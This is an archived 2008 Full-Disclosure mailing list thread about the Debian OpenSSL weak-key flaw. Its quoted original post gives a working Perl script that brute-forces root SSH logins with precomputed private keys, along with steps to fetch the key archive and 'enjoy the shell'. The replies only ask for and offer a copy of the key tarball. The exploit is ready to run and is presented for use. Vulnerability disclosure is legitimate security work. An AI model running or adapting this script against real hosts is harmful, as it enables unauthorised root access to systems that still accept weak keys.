| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 18 May 2008 22:58:37 -0500
From: "Fredrick Diggle" <fdiggle@...il.com>
To: "bob harley" <bobb.harley@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Working exploit for Debian generated SSH Keys
Yes Fredrick Diggle will get you a copy :)
On Sun, May 18, 2008 at 10:13 AM, bob harley <bobb.harley@...il.com> wrote:
> Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing
> nicely ;-)
>
> On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm@...dbeef.de> wrote:
>>
>> Hi full-disclosure,
>>
>> the debian openssl issue leads that there are only 65.536 possible ssh
>> keys generated, cause the only entropy is the pid of the process
>> generating the key.
>>
>> This leads to that the following perl script can be used with the
>> precalculated ssh keys to brute force the ssh login. It works if such a
>> keys is installed on a non-patched debian or any other system manual
>> configured to.
>>
>> On an unpatched system, which doesn't need to be debian, do the following:
>>
>> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>>
>> 2. Extract it to a directory
>>
>> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
>> Bits, generated on an upatched debian (this is the key this exploit will
>> break)
>>
>> 4. Run the perl script and give it the location to where you extracted
>> the bzip2 mentioned.
>>
>> #!/usr/bin/perl
>> my $keysPerConnect = 6;
>> unless ($ARGV[1]) {
>> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
>> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
>> print "By mm@...dbeef.de\n";
>> exit 0;
>> }
>> chdir($ARGV[0]);
>> opendir(A, $ARGV[0]) || die("opendir");
>> while ($_ = readdir(A)) {
>> chomp;
>> next unless m,^\d+$,;
>> push(@a, $_);
>> if (scalar(@a) > $keysPerConnect) {
>> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
>> ".$_ } @a)." ".$ARGV[1]);
>> @a = ();
>> }
>> }
>>
>> 5. Enjoy the shell after some minutes (less than 20 minutes)
>>
>> Regards,
>> Markus Mueller
>> mm@...dbeef.de
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists